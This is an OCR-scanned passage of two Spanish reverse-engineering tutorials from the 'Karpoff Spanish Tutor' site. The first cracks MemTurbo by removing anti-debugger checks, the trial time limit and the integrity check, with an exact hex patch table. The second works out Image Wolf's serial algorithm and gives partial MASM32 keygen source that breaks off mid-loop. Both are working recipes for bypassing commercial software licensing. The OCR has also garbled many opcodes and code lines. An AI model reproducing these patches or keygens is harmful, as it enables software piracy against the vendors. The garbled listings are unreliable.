:0040BF59 E84A8AFFFF call 004049A8 --> Comprobación de la INT 3. 

:0040BF5E ESB088FFEFF call 00404813 --> Comprobación del Meltlce. 

:0040BF63 85CO0 test eax, eax 

:0040BF65 7512 ¡ne 0040BF79 

a sigue y sigue 


Y el código sigue y sigue más o menos igual dando vueltas y más vueltas sobre lo mismo. Podemos encontrar la 
comparación con 1E y el mismo código de arriba en 40BFBF, 40C048, 40C128, 40C199. En realidad la comparación y 
el salto posterior no hacen nada más que mandarnos a las rutinas Anti-Sice. 


Si invertimos el salto vamos a RaiseException con el consiguiente cuelgue y si lo dejamos vamos donde "estaba" la 
INT3. Y vuelta para arriba y vuelta para abajo. Como ya hemos liquidado las rutinas Anti-Sice podemos seguir 
trazando tranquilamente. 


Bien, si echamos un vistazo hacia arriba veremos que todo esto empieza en 40BAJE, el código se repite hasta 40C20F 
que es donde está el RET. Entretanto y más o menos escondido podemos encontrar cosas curiosas como esta: 


e :0040BAFF 8A9030DD4400 mov dl, byte ptr [eax+0044DD30] --> Algo encriptado. 
:0040BBOS5 32D1 xor dl, cl --> Xorea el valor con el número de caracteres [3F]. 
:0040BB07 80F272 xor dl, 72 --> El resultado xoreado con 72. 

:0040BBOA 49 dec ecx --> Abajo el contador para el siguiente xoreo... 

:0040BB0B 889020054500 mov byte ptr [eax+00450520], dl --> Lo ponemos en su sitio. 
:0040BB11 40 inc eax --> Siguiente valor. 

:0040BB 12 3BCE cmp ecx, esi --> Comprobación del contador. 

:0040BB 14 75E9 ¡ne OO40BAFE --> Volvemos arriba. 


Que es la desencriptación de la siguiente cadena de texto correspondiente a la Clave del Registro: 
HKEY_CURRENT_USERWSoftwarelMicrosofA WindowsWCurrentVersionExplorerDataViewSettings 


Acto seguido lo completa con -2RC1 y llama a RegOpenKeyExA. Luego la vuelve a encriptar nada más salir de un 
RegQueryValueExA, hay varias encriptaciones y desencriptaciones de diversas claves del Registro a lo largo de ese 
fragmento de código. Como cosa curiosa vemos la incorporación de varios valores fijos como son 07, 09 y 13 que 
tienen su importancia. 


La comprobación de la fecha se hace después de una larga manipulación del valor de las cadenas DataViewSettings- 
2RC1 y DataViewStream-2RC1. Los resultados válidos sólo pueden ser uno de esos tres (07, 09, 13). Dependiendo de 
cual sea, llegamos al RET, salimos y nos encontramos con esto: 


:00409B35 ES6EAEFFFF call 004049A8 --> Otra llamadita más a la INT 3, sin problemas... 
:00409B3A E85F1F0000 call 0040BADE --> Venimos de aquí. 

:00409B3F 83F807 cmp eax, 00000007 --> Tiempo OK. 

:00409B42 0F8494000000 je 00409BDB --> Este es el bueno. 

:00409B48 83F809 cmp eax, 00000009 --> ¡MemTurbo expires soon!. Creo que sale a los 20 días. 
:00409B4B 7462 je 0O409BAF --> A la ventana de aviso de "quedan pocos días". 

:00409B4D 83F813 cmp eax, 00000013 --> Memturbo ha caducado... Gracias por probar el programa, 
:00409B50 7424 je 00409B76 --> A pasar por caja... 


Creo que no hay que decir cual hay que cambiar. E9 94 00 00 00 90 es el nuevo valor de 409B42. 


CUESTIONES ESTÉTICAS - DE CAZA POR LA PILA 


Hagamos un pequeño paréntesis... Siempre suelo dejar para el final la tarea de maquillar el programa para que parezca 
la versión integra. Cambiar las referencias a Shareware, cambiar el menú About, etc. Pero en este caso vamos ha 
hacerlo ahora para hacer más comprensible como cazar la comprobación del CRC. 


Si echamos un vistazo al programa con el ExeScope veremos que está TODO. Y con "todo" me refiero a cosas como 
esta: 


32809,MemTurbo II 

32810,Licensed Version 

32811,Evaluation Copy 

32812,%s, Serial No. MT-39601$0AThis program is licensed for use on a single computer.$0APlease do not distribute 
this copy! $0AThank-you for registering! 

32813,%s$0AThis product may be evaluated for 30 days, after which it must be purchased or uninstalled. Continued use 
beyond this period without a license is illegal. 

61707,System registry entries have been removed and the INI file (if any) was deleted. 

** This is the LICENSED version of MemTurbo. Please do not illegally redistribute! 


Licensed version, Evaluation, un número de Serie, una referencia a un archivo .ini (¿memturbo.ini?), This is the 
LICENSED ... que viene en el diálogo About pero en el programa no aparece. 


Lamentablemente no hay un diálogo en plan "Enter Registration Code", pero esta misma cadena si que aparece por 
algún lado con el Sice.(en 44DE18 concretamente), ¿? 


¿Como modificamos el horrible "Evaluation Copy" de la ventana de inicio del programa?, podríamos cambiar con el 
editor Hex la referencia a Evaluation y poner algo así como Registered que tiene el mismo número de caracteres y 
queda bonito, pero ya que tenemos el Licensed vamos a cambiar uno por otro. 


¿Donde carga el programa el dichoso Evaluation?. Al Loader de nuevo. 


Veamos... C++... a ver.... BPPX LOADSTRINGA, ...el primero no, con el segundo ya tenemos la carátula y el nombre 
del programa, con el tercero la versión y con el cuarto se carga el "Evaluation copy'"'. Después de seguirle la pista que 
ha ido dejando por la pila te dire que hay un PUSH 0000802B que es el responsable del desaguisado. 


Este aparentemente inofensivo valor es el encargado de mostrar la cadena "Evaluation copy". El procedimiento es el 
siguiente, se guarda 802B en la pila, damos un montón de vueltas arriba y abajo por el código para despistar, al rato 
entramos en LOADSTRINGA y seguimos avanzando hasta la función Kernel32!/0RD_000E: 


call Kernel32!LoadResource --> Salimos de aquí con una dirección de la sección rsrc en EAX [48ED48] 
test eax,eax --> Comprobación. 

mov [ebp-04], edi --> Una dirección OOG6CFXXX. 

and dword ptr [ebp+0C], OF --> ¡AQUI! 802B and OF = B 

movzx ecx, word ptr [eax] 

mov [ebp-1C], ecx 

add eax, 02 --> Ajustamos EAX a la posición en la que aparece el texto. 
mov edx, [ebp+0C] --> Hay que joderse, es un contador... [B] 

dec dword ptr, [ebp+0C] --> Empieza la cuenta... 

test edx, edx --> La comprobación. 

jz BFF80C61--> Saltamos a un loop hasta que EDX sea 0. 


Aquí ha metido en EAX una dirección de la sección rsrc, luego mete en [ebp-04] una dirección de memoria 6CFXXX 
que va ser usada como paso intermedio, obtiene mediante al AND OF un valor que va ser usado como contador del 
bucle y vamos sumando 2 a EAX hasta que EDX (B) sea 0, cuando EDX alcanza ese valor la cadena que se va a usar 
es la que aparece en la dirección que marca EAX (Evaluation Copy). 


Si cambiamos el PUSH 0000802B por PUSH 0000802A, el valor que se va a cargar es el inmediatamente superior 
(EDX = A --> EAX = Licensed version). 


La cosa no ha acabado, una vez que salimos al código real del programa tenemos en 6CFXXX la cadena Evaluation 
copy, la mueve a otra dirección (0126664, este dato es fijo), establece un byte de control y borra el valor de 6CFXXX. 
¡Buff! 

¡ 


Si lo hacemos de nuevo vemos que solo paramos una vez en LOADSTRINGA ya que el programa comprueba el byte 
de control (hay una comprobación con código diferente para cadena de texto que se carga) y si lo encuentra nos manda 


directamente a la dirección 0126664 sin pasar por el bp que habiamos puesto, ¡Joder!. 


Todo lo anterior nos va a servir para cazar la comprobación del CRC que también tiene historia... :-) 


Comprobación de la Integridad del Archivo 


Esto también tiene su historia, porque la ventana de aviso de archivo corrupto no aparece siempre, te puedes pegar 20 
minutos seguidos dandole al botón de Recover now y no pasa nada, otra vez aparece a la primera o a los cinco minutos 
o incluso no aparece en toda la tarde, ¿?. Pero una vez que aparece el programa deja de funcionar y la ventana sale una 
y otra vez como una maldición.. 


Como ya sabemos donde mirar, esperamos que aparezca la ventana, metemos un BPX LOADSTRINGA e intentamos 
recuperar memoria, esta vez saltamos rápido al SICE. Trazamos , le ponemos un bp a la instrucción AND DWORD 
PTR [EBP+0C], OF y vamos tomando nota de los valores que va tomando el [ebp+0C] hasta que se carga la cadena 


"Your memturbo binary appears corrupt...”. El valor es 8018, metemos un comando de búsqueda: 


S 0 LFFFFFFFF 68 18 80 00 00 
Pattern found at 00406F3B (00406F3B) --> Solo hay uno en el rango de memoria de memturbo. 


68 es el valor de PUSH, este es el código donde aparece: 


:00406F2D E8E3200200 call 00429015 

:00406F32 84DB test bl, bl 

:00406F34 5B pop ebx 

:00406F35 740E je 00406F45 --> Un hermoso salto. 
:00406F37 6AFF push FFFFFFFF 

:00406F39 6A00 push 00000000 

:00406F3B 6818800000 push 00008018 --> AQUÍ 
:00406F40 E8B37B0200 call 0042EAF8 


La primera reacción es modificar el salto, pero no sirve de nada, ya que lo único que hacemos con esto es que no 
aparezca la ventana, sin embargo el programa deja igualmente de funcionar. 


Sigamos con la caza, este código que incluye PUSH 00008018 empieza en 406EBD y tiene todas las pintas de un call 
ya que la instrucción inmediatamente superior es un RET. Pero de un call con truco, veamos: 


:00407198 53 push ebx --> Inicio del bucle. 
:00407199 53 push ebx 

:0040719A 53 push ebx 

:0040719B 8D45BC lea eax, dword ptr [ebp-44] 
:0040719E 53 push ebx 

:0040719F 50 push eax 

:004071A0 FF1550C54300 call dword ptr [0043C550] --> Llamada a la función PeekMessage. 
:004071A6 85CO0 test eax, eax 

:004071A8 741A je 004071C4 --> Salto importante. 
:004071AA E895E40200 call 00435644 

:004071AF 8B4004 mov eax, dword ptr [eax+04] 
:004071B2 8BC8 mov ecx, eax 

:004071B4 8B10 mov edx, dword ptr [eax] 

:004071B6 FF525C call [edx+5C] --> Al programa... 
:004071B9 85C0 test eax, eax 

:004071BB 75DB jne 00407198 --> Fin del Bucle. 
:004071BD 53 push ebx 

:004071BE FF1554C54300 call dword ptr [0043C554] 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:004071A8(C) 


| 
:004071C4 6800400000 push 00004000 --> Llegamos aquí. 


:004071C9 6A08 push 00000008 

:004071CB FF7SEC push [ebp-14] 

:004071CE A130D54400 mov eax, dword ptr [0044D530] --> ¡Aquí está!. 
:004071D3 FFDO call eax --> Este es el call maldito. 

:004071D5 3BC3 cmp eax, ebx 

:004071D7 7431 je 00407204 

:004071D9 8D8800400000 lea ecx, dword ptr [eax+00004000] 


Estamos contemplando el "backbone" del programa, espinazo en cristiano, todos los procesos del mismo pasan por 
aquí. El valor de EAX depués de PeekMessage es el que decide si se salta o no y la dirección de la llamada [call EAX] 
la dedice el valor de 44D530. Si ese valor es 407005 el programa se desarrolla perfectamente, si el valor es 406EBD 
vamos al mensaje de error. 


Sería demasiado largo explicar como va a parar 406EBD a 44D530 y porqué la aparición de este valor tiene un 
componente aleatorio, en este proceso intervienen GetTickCount, la fecha del system.ini (creo) ¿?, un montón de 
valores fijos que trae el programa y una larga serie de operaciones matemáticas que, si todo va mal, nos llevan a este 
código: 


:0040C253 3B45EC cmp eax, dword ptr [ebp-14] 


:0040C256 59 pop ecx 

:0040C257 59 pop ecx 

:0040C258 740A je 0040C264 

:0040C25A C70530D54400BD6E4000 mov dword ptr [0044D530], 00406EBD --> Estamos jodidos. 


Podríamos parchear el salto en 400258 pero por alguna razón esto cuelga la máquina, por lo visto al llegar a ese salto 
el proceso está tan avanzado que es inevitable que el valor 406EBD vaya a 44D530. 


Así que la derecha es hacer que en 4071D3 CALL EAX siempre se llame a 407005. Y esto lo hacemos modificando en 
4071CE la instrucción MOV EAX, DWORD PTR [0044D530] por MOV EAX, 00407005. 


Estos son los cambios a realizar con el editor Hex: 


DIRECCION OFFSET VALOR CAMBIAR A 


[— :00409B42 | 00009142 |0F8494000000 |E99400 00 00 90 
| :0040CFBO |  0000C5B0 |  682B80 |  682A80 
| :00407ICE | 000067CE | A130D544 | B8057040 


Nota 


Si "quemas" el programa adelantando el reloj para ver si los cambios funcionan y luego vuelves el reloj a su fecha, 
aparecerá una molesta ventanita avisando que has cambiado la fecha etc. Esto se soluciona rápidamente borrando las dos 
Claves del Registro mencionadas arriba. También se le puede meter mano al código. El push fatídico está entre 40BA9E y 
40C20F, suerte. :-) 


ESTO NO HA TERMINADO 


La verdad es que pensaba acabar aquí, pero me jode un montón dejar la ventana de "Cache Tuning" deshabilitada y 
con el aviso "de esta ventana solo funciona en la versión buena”. Así que ponte cómodo que todavía queda un rato. 


Habilitando ventanas 


Veamos, para que una ventana funcione y con que funcione me refiero a que reciba entradas de teclado o de ratón se 
utiliza la función Enable Window que tiene la siguiente forma: 


BOOL EnableWindow 
HWND hWnd, 11 el manipulador de ventana 
BOOL bEnable 1/ la bandera para validar o desactivar la entrada 


Bien, vamos a ver un pequeño ejemplo, iniciamos el programa, vamos al Sice, ponemos un BPPX ENABLEWINDOW 
y hacemos click, por ejemplo, en la pestaña Options, aterrizamos aquí después de salir de la función: 


:00428760 FF742404 push [esp+04] --> El Flag para activar o desactivar la ventana. 
:00428764 FF711C push [ecx+1C] --> El manipulador o handle. 

:00428767 FF152CC64300 call dword ptr, [0043C62C] --> LLamada a Enable Window. 
:0042876D EBOE ¡mp 004287D --> Salimos aquí. 


El flag lo tenemos fácil, 1 - Activado, O - Desactivado. Pero tenemos dos problemas, el primero es identificar la 
ventana Cache Tuning y el segundo cual es su manipulador. 


El primer problema lo solucionamos con ExeScope, vamos al Dialog 106, la ventana que queremos habilitar tiene 
cuatro controles msctls_trackbar32: Sliderl que son controles deslizantes que definen el tamaño máximo de la caché, 
el mínimo, el tamaño de los bloques y una cosa rara que se llama ASync IO Buffers. Debemos apuntar también cuales 
son y cual es el número de los elementos restantes. (Un Button y 19 referencias a Static) 


Una vez que sabemos esto vamos al Sice y hacemos un HWND MEMTURBO para buscar donde están esos controles, 
el manipulador es el valor de la columna de la izquierda cuyo encabezado es Window handle. Ojo que cada vez que se 
inica el programa son diferentes por eso hemos identificado los elementos característicos de la ventana para saber 
donde empieza y donde acaba. 


Al Loader de nuevo, ¿Cuando se carga la ventana de Cache Tuning? ... Ponemos un BPPX ENABLEWINDOW, vamos 
dandole alegremente al FS y cada vez que salte el bp metemos un HWND MEMTURBO para ver si ya están cargados 
los controles msctls_trackbar32 y cuando les toca ser procesados por EnableWindow. Observamos que siempre 
aparecemos en la dirección del ejemplo de arriba. 


Pues no aparecen, por lo menos en el código donde se carga el resto, me temo que vuelve a haber gato encerrado... 
efectivamente: 


:004016F2 6A02 push 00000002 --> Principio. 
:004016F4 FF731C push [ebx+1C] 

:004016F7 FFDS call ebp 

:004016F9 50 push eax 

:004016FA E890420200 call 0042598F 

:004016FF 8BD8 mov ebx, eax 

:00401701 3BDE cmp ebx, esi 

:00401703 740A je 0040170F --> Este es el responsable. 
:00401705 56 push esi 

:00401706 8BCB mov ecx, ebx 

:00401708 ES4C700200 call 00428759 --> Bucle de EnableWindow para cargar las ventanas 
:0040170D EBE3 ¡mp 004016F2 --> Fin. 


Lo gracioso es que para cuando llegamos aquí las ventanas del programa ya están cargadas, todas menos la que nos 
interesa, se puede ver con un HWND. Así que esto o es código redundante o estamos a punto de soltar al gato. 


Veamos si con un G 40170F pasa algo, saltamos a 40170F y seguimos avanzando, a la salida de uno de los numerosos 
call's que encontramos vemos con HWND que ya tenemos cargados los controles, despacio.... hasta aquí: 


:0040186B 6A00 push 00000000 

:0040186D 6866060000 push 00000666 --> ¿El número de la Bestia? 
:00401872 53 push ebx 

:00401873 FF701C push [eax+1C] 

:00401876 FFDÉ call esi 

:00401878 8BCF mov ecx, edi 

:0040187A ES5DFCFFFF call 004014DC --> Entramos aquí. 
:0040187F 6A01 push 00000001 


Entramos en call 004014DC y seguimos avanzando despacio, por lo que parece la ventana del Cache Tuning se carga 
aparte, estamos buscando exáctamente una llamada a Enable Window y también buscamos cuando el valor de esp+04 
se pone a 0. 


Después de algunas pruebas, esto no siempre sale a la primera, encontramos que la dirección que marca esp+04 es 
006CE908 y que es siempre la misma, así que nos ponemos una ventana de control con esa dirección (DEX 3 
6CE908), seguimos y ... 


:0040151D 3BF8 cmp edi, eax 

:0040151F 74DD je 004014FE 

:00401521 6A00 push 00000000 --> ¡El Flag! 

:00401523 8BCF mov ecx, edi 

:00401525 E82F720200 call 00428759 --> A EnableWindow. 
:0040152A EBD2 ¡mp 004014FE 


Pues esto es lo que hay... cambiamos el PUSH 00000000 por PUSH 00000001, entramos en el call 428759 y vamos 
controlando los handler que el programa va cargando en ECX+1C, comprobando sucesivamente con HWND 
MEMTURBO y D ECX+1C que efectivamente corresponden a los elementos de nuestra ventana: 


:00428760 FF742404 push [esp+04] --> El Flag siempre va a ser 1. 
:00428764 FF711C push [ecx+1C] --> Controlamos que este valor corresponda a nuestra ventana. 


:00428767 FF152CC64300 call dword ptr, [0043C62C] --> LLamada a Enable Window. 
:0042876D EBOE ¡mp 004287D --> Nos vamos... 


No vamos a tener ningún problema, el valor de ECX+1C siempre corresponde al handler de los elementos de nuestra 
ventana. El programa carga las otras ventanas en el bucle 4016F2 - 40170D y luego sigue hasta 401521 donde el valor 


del Flag se pone a O para procesar la ventana del Cache Tuning. 


El último cambio con el editor Hex: 


DIRECCION OFFSET VALOR CAMBIAR A 


| :00401521 |  00000B21 | 6A 00 | 6A 01 


FINAL 


Creo que ya está bien por hoy. Hemos desempakado el programa, quitado las rutinas antidebugger, saltado el límite de 
tiempo, la comprobación de integridad, hemos logrado una presentación atractiva y como propina hemos habilitado la 
ventana que nos faltaba. 


Conclusión, salvo un par de menudencias como son quitar la nota de aviso en la ventana del Cache y habilitar la línea 
"** This is the LICENSED..." en el menú About, tenemos el programa completo, ¿Que más quieres?. 


Se me olvidaba, esto es con propositos educativos..., el autor no se hace responsable..., etc, etc... 


Saludos y hasta otra... 


Karpoff Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre 


Ingeniería Inversa y Programación. Email "Colabora con tus Proyectos" 


Programa: 


Karpoff Spanish Tutor 
Image Wolf 1.04 Build 005 


PROTECCION: Name / Serial. 

Objetivo: Hacer un Keygen. 

Descripcion: Parece que busca en la Red, archivos gráficos o de video. 
Dificultad: Aficionado 

DOWNLOAD : http://www.trellian.com/bin/iwolf104.exe 

Herramientas: Softice, Masm. 

CRACKER: CaoS ReptantE FECHA: 06/09/2001 


INTRODUCCION 


Bueno, ya estamos aquí de nuevo. Este será probablemente el último tuto de CaoS ReptantE sobre 
keygens, y aún es posible que después vuelva a las tinieblas de donde salió... Hoy nos enfrentamos a un 
programa que hubiera podido resultar muy complicado para encontrar el sistema de generación del serial, 
si no fuera por unos pocos fallos tontos del programador. Veremos como una buena idea, queda malograda 
por esos fallos. La buena idea consiste en que para obtener el serial se basa, además de en el nombre con el 
que queremos registrarnos, en los primeros caracteres del propio serial que introducimos. Esto significa 
que si esos caracteres no son los correctos, el número que encontraremos, y con el que trataremos de 
registrarnos, no servirá para nada. ¿Cuál es el fallo entonces? Que la comparación de esos caracteres se 
hace de una manera descarada y por si fuera poco, antes de generar el número, cuando sería mucho mejor 
hacerlo después de haber generado el número, y con un poco más de discreción. De manera que, aunque 
como de costumbre el código que genera el serial está metido entre toneladas de basura, hasta el más 
despistado se entera de que los tres primeros caracteres del serial son "IW-". 


AL ATAKE 


Una vez cargado el Softlce, ejecutaremos el programa y trataremos de registrarnos. Introduciremos nuestro nombre 
(en mi caso: "CaoS ReptantE”) y un número de registro chungo. Antes de darle a OK, hacemos ctrl-D para entrar en 
el Slce y establecemos un breakpoint: bpx getdlgitemtexta. F5 para continuar y OK. Salta el Slce, F5 nuevamente 
para que lea la segunda ventana de texto y F12 que nos lleva a: 


:0040BFF6 6A52 push 00000052 


Ahora buscaremos en la memoria nuestro serial chungo mediante la instrucción s 30:00 1 ffffffff 'serial_chungo' y la 
instrucción s para continuar buscando. Nos aparece el número en dos posiciones de la memoria. A continuación, 
introduciremos la instrucción bpr inicio_dirección_obtenida final_dirección_obtenida r para cada una de las 
direcciones halladas para pillar al programa cuando lee nuestro serial. Pulsamos F5 para continuar, e iremos 
alternando F10 para tracear con paciencia ya que el camino esta lleno de basura y F5, hasta llegar a: 


:0040CAE4 OFBEO2 movsxX eax, byte ptr [edx] 
:0040CAE7 83F849 cmp eax, 00000049 
:0040CAEA 7523 jne 0040CBOF 


Aquí vemos la comparación entre el primer carácter de nuestro serial chungo e "I". (49h) 


:0040CAEF OFBE5101 movsx edx, byte ptr [ecx+01] 
:0040CAF3 83FA57 cmp edx, 00000057 
:0040CAF6 7517 jne 0040CBOF 


Vemos ahora la comparación entre el segundo carácter y "W". (57h) 


:0040CAF8 6A2D push 0000002D 

:0040CAFA 8B450C mov eax, dword ptr [ebp+0C] 
:0040CAFD 50 push eax 

:0040CAFE E85D230100 call 0041EE60 


Como nos mosquea ver 2D (código de "-"), entramos en el call y vemos: 


:0041EE79 3807 cmp byte ptr [edi], al 
:0041EE7B 7404 je 0041EE81 


Comparación entre el tercer carácter y "-". ¿No os habíais dado cuenta de que se efectuaban esas comparaciones? No 
importa. El programador lo ha previsto y os da una segunda oportunidad ;-) 


:0040CD5C OFBEO8 mOvVsX ecx, byte ptr [eax] 
:0040CD5F 83F949 cmp ecx, 00000049 

:0040CD62 750€ jne 0040CD70 

:0040CD67 OFBE4201 movsX eax, byte ptr [edx+01] 
:0040CD6B 83F857 cmp eax, 00000057 

:0040CD6E 7407 je 0040CD77 


Aunque no lo indico, también vuelve a comprobar el guión, por si acaso :-D Le damos a F5 y continuamos: 


:0041EE0OB 8BO1 mov eax, dword ptr [ecx] 


Traceamos a partir de aquí y vemos que estamos en un bucle en el que se van moviendo cosas. Y una de las cosas 
que se mueven es nuestro serial chungo (en EDX), que se copia en otra dirección (EDI) 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :0041EE1E(C), :0041EE38 (U) 


:0041EE01 8917 mov dword ptr [edil], edx 


Ahora ampliaremos nuestro campo de búsqueda mediante la instrucción bpr inicio_nueva_dirección 
final_nueva_dirección r. Continuamos con F5 y vemos que verifica de nuevo el guión y substituye su código ASCII 


(2D) por 00. Nuevamente F5 y caemos en: 


:0040CBC6 OFBE11 movsx edx, byte ptr [ecx] 
:0040CBC9 83FA52 cmp edx, 00000052 
:0040CBCC 7502 jne 0040CBDO 


Aquí comprueba si el primer carácter del serial es "R". Esta es una de las incógnitas que le quedan al programa, la 
otra es que genera otro serial correcto además del que vamos a encontrar. Si alguien quiere entretenerse, ya sabe 
como... :-) F5 una vez más y: 


:0040CBEE OFBE11 movsx edx, byte ptr [ecx] 
:0040CBF1 83C209 add edx, 00000009 


Toma el código ASCU del primer carácter de nuestro serial ("I" = 49h) y le suma 9 (52h) 
(A partir de aquí sólo voy a poner las instrucciones necesarias para entender la generación del serial, porque sino, 
esto se puede convertir en un galimatías) 


:0040CBF7 8A84057CFFFFFF mov al, byte ptr [ebp+eax-00000084] 


En esta posición de memoria, se han situado las cuatro primeras letras de nuestro nombre (en mi caso "CaoS"). 
Ahora tomamos el código de la primera de ellas ("C" = 43h). 


:0040CBFE F6EA imul dl 
:0040CC03 88840D7CFFFEEF mov byte ptr [ebp+ecx-00000084], al 


Ha multiplicado 43h por 52h (1576h) y ha puesto 76 en el lugar que ocupaba la "C". Este proceso se repite con los 
códigos de las otras tres letras y luego se vuelve a efectuar con el código del siguiente carácter del número ("W" = 
57h) al que se le suma 9 (60h) y se multiplica por los resultados obtenidos en el primer proceso: 


Ca o Ss 43 61 6F 53 

x 52h 76 52 8E 96 

x 60h 40 elo) 40 40 
:0040CC47 8B4508 mov eax, dword ptr [ebp+08] 
:0040CC4A 034588 add eax, dword ptr [ebp-78] 


En EAX tenemos la dirección de la cadena "CaoS ReptantE" 


:0040CC4D OFBEO8 mOVsX ecx, byte ptr [eax] 
:0040CC50 83C109 add ecx, 00000009 


Tenemos ECX = 4Ch ("C" = 43h, + 9 =4C) 


:0040CC56 8A84157CFFFFEFF mov al, byte ptr [ebp+edx-00000084] 
:0040CC5D 32C1 xor al, cl 
:0040CC62 88840D7CFFFEEF mov byte ptr [ebp+ecx-00000084], al 


Ha tomado el primero de los cuatro números obtenidos anteriormente (40) y lo ha "xoreado" con 4Ch, a continuación 
ha puesto el resultado (0C) en el lugar que ocupaba el número. Este proceso se repite, primero con los otros tres 
números y luego con cada letra de las que forman el nombre. 


40 [elo 40 40 
XOR 4Ch el 8c e e 


XOR 4Eh 74 F4 74 74 


:0040CC6D 8B957CFFFFFF mov edx, dword ptr [ebp+FEFFFFF7C] 
:0040CC73 8955FC mov dword ptr [ebp-04], edx 


Ha colocado el número obtenido en otro lugar. A continuación hace algunas comparaciones de las que tomaremos 
nota para hacer el keygen. 


:0040CC76 837DFCOO cmp dword ptr [ebp-04], 00000000 
:0040CC7A 7D08 Jjge 0040CC84 

:0040CC7C 8B45EFC mov eax, dword ptr [ebp-04] 
:0040CC7F F7D8 neg eax 

:0040CC81 8945EFC mov dword ptr [ebp-04], eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0040CC7A(C) 

:0040CC84 837DFCOO cmp dword ptr [ebp-04], 00000000 
:0040CC88 7507 jne 0040CCc91 

:0040CC8A C745FC01000000 mov [ebp-04], 00000001 


Si el número es igual a cero, lo hace igual a uno. 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :0040CC88(C), :0040CCA3 (U) 


:0040CC91 817DFCO0OF270000 cmp dword ptr [ebp-04], 0000270F 
:0040CC98 7DO0B Jjge 0040CCA5 

:0040CC9A 8B4DEC mov ecx, dword ptr [ebp-04] 
:0040CC9D 6BCIOA imul ecx, 0000000A 

:0040CCAO0 894DFC mov dword ptr [ebp-04], ecx 
:0040CCA3 EBEC jmp 0040CC91 


Aquí tenemos otro fallo que nos ahorrará trabajo. Compara el número con 270Fh, que es igual a 9999, con lo que nos 
está diciendo que vamos bien y que deberemos pasar este número a decimal (a veces es conveniente, cuando aparece 
uno de esos números cabalísticos, buscar su equivalencia en decimal). Si es inferior, lo va multiplicando por diez 
hasta que es igual o mayor. Me parece que se ha equivocado, ha puesto jge, cuando tenía que haber puesto jg :-D 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :0040CC98(C), :0040CCBC (U) 


:0040CCA5 817DFC3F420F00 cmp dword ptr [ebp-04], 000F423F 
:0040CCAC 7E10 jle 0040CCBE 

:0040CCAE 8B45EFC mov eax, dword ptr [ebp-04] 
:0040CCB1 99 cda 

:0040CCB2 B90A000000 mov ecx, 0000000A 

:0040CCB7 F7F9 idiv ecx 

:0040CCB9 8945EFC mov dword ptr [ebp-04], eax 
:0040CCBC EBE7 jmp 0040CCA5 


Aquí compara el número con F423Fh (999999) y si es mayor, lo divide por diez. Aquí lo ha hecho bien :-) Ha 
dividido nuestro número (7474F474h) por Ah cuatro veces hasta conseguir el número 2FB36h que es igual a 195382. 
Así pues, ya hemos conseguido nuestro serial. 


Bien, ya tenemos todos los mimbres para hacer el cesto :-) y podemos hacer el keygen. Para ello echaremos mano, 
como en otras ocasiones, del Masm32. Necesitaremos crear dos archivos: el de recursos rsrc.rc y el del código, al 
que llamaremos por ejemplo /Wolf.asm. Del primero no voy a comentar nada, pues es prácticamente igual al de otros 
keygens que hemos hecho, como por ejemplo el del Power Archiver; y del segundo sólo comentaré el procedimiento 
operacion que es donde generaremos el serial, porque la parte restante también la hemos visto en tutos anteriores. 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32XincludeYwindows.inc 
include c:imasm32lincludeluser32.inc 


include c:imasm32XincludeXkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.1lib 


.const 

IDD_DIALOG EQU 1000 

IDC_NAME EQU 1001 

IDC_SERIAL EQU 1002 

IDC_GEN EQU 1003 

IDC_EXIT EQU 1004 

DlgFunc PROTO :DWORD, :DWORD, :DWORD, : DWORD 


Operacion PROTO 


.data 


nombre db 64 dup(0),0 

numero db 4 dup(0),0 

serial db 9 dup(0),0 

nada db 20 dup(0),0 

Icono db "keygen",0 

Iconimage db "keygen",0 
minombre db "CaoS ReptantE",0 
menosde4 db "¡Mínimo 4 caracteres!",0 
hInstance dd 0 

hIcon dd 0 

hWnd da 0 


. code 


starts 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG,NULL,addr DlgFunc, NULL 
invoke ExitProcess,NULL 


DlgFunc proc hD1g:DWORD, uUMsg:DWORD, wParam:DWORD, 1lParam: DWORD 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,addr Icono 
mov hlIcon,eax 
invoke SendMessage, hDlg, WM_SETICON,1,hIcon 
invoke SetDlglItemText,hDlg,IDC_NAME,ADDR minombre 
.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 
invoke SendMessage,hDlg,WM_CLOSE, 0,0 
.elseif ax==IDC_GEN 
invoke GetDlglItemText,hDlg,IDC_NAME,ADDR nombre, 80 
invoke l1lstrlen,ADDR nombre 
invoke Operacion 
.1f eax== 
invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nada 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR menosde4 
.else 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR serial 
invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nombre 


.endif 
ret 
.endif 
.endif 
.endif 
ret 
DlgFunc endp 


Operacion proc 


.1f eax < 4 
mov eax,1l 
ret 

.endif 

pushad 


Comprobamos que el nombre no tiene menos de cuatro letras y guardamos los registros, por lo que pueda ser... 


mov ebx, offset nombre 
mov ecx, offset numero 
xXor eax, eax 
buclel: mov dl, byte ptr [ebx+eax]l 
mov byte ptr [ecx+eax], dl 
inc eax 
«if al < 4 
jmp buclel 
.endif 


Tomamos los códigos ASCII de las cuatro primeras letras del nombre y los ponemos en numero. 


push ecx 
bucle2: mov eax, 52h 
mov dl, byte ptr [ecx] 
.1f dl== 
jmp seguirl 
.endif 
imul dl 
mov byte ptr [ecx], al 
inc ecx 
jmp bucle2 


Después de guardar la dirección de numero, multiplicamos los cuatro números que teníamos por 52h (código de "I" = 
49, más 9) 


seguirl: pop ecx 
push ecx 
bucle3: mov eax, 60h 
mov dl, byte ptr [ecx] 


jmp seguir2 
.endif 
imul dl 
mov byte ptr [ecx], al 
inc ecx 
